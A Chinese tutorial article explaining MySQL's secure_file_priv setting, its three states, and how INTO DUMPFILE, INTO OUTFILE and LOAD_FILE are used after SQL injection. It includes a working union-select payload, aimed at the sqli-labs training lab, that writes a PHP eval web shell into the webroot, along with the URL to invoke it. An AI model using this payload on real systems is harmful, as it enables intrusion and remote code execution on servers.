Mysql 中的secure_file_priv参数设置方法

MySQL的secure_file_priv变量用于限制文件的读取和写入,在后期漏洞注入中,可以使用INTO DUMPFILE和INTO OUTFILE将数据写入文件,或者使用LOAD_FILE下载文件,本文介绍Mysql 中的secure_file_priv参数设置,感兴趣的朋友一起看看吧

secure_file_priv是MySQL中的系统变量，用于限制文件的读取和写入。

该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。

修改完参数之后，必须重启数据库才能生效。

启动MySQL，先查看secure_file_priv的值。

命令：show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ，限制文件的读取和写入。

2.secure_file_priv = 文件路径 ，限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路径；

内容在文件中是以一行的形式呈现，多行数据会出现数据保存不全；

dumpfile只能写一行，并且输出中不存在任何格式。

2.select  *** into outfile  文件路径；

内容有特殊格式转换，该换行换行，较比dumpfile更加好用；

outfile可以写入多行数据，并且字段和行终止符都可以作为格式输出。

例如：?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

调用：url/test.php?123=phpinfo();

3.select  *** load_file （下载文件）

select  load_file(文件路径);

到此这篇关于Mysql 中的secure_file_priv参数设置的文章就介绍到这了,更多相关mysql secure_file_priv参数设置内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家！

您可能感兴趣的文章:

• Win10 MySQL如何解决secure_file_priv在my.ini无法设置问题
• MYSQL突破secure_file_priv写shell问题
• mysql中secure_file_priv=不生效问题及解决
• windows下如何解决mysql secure_file_priv null问题
• mysql如何配置secure_file_priv
• MySQL导出数据遇到secure-file-priv问题的解决方法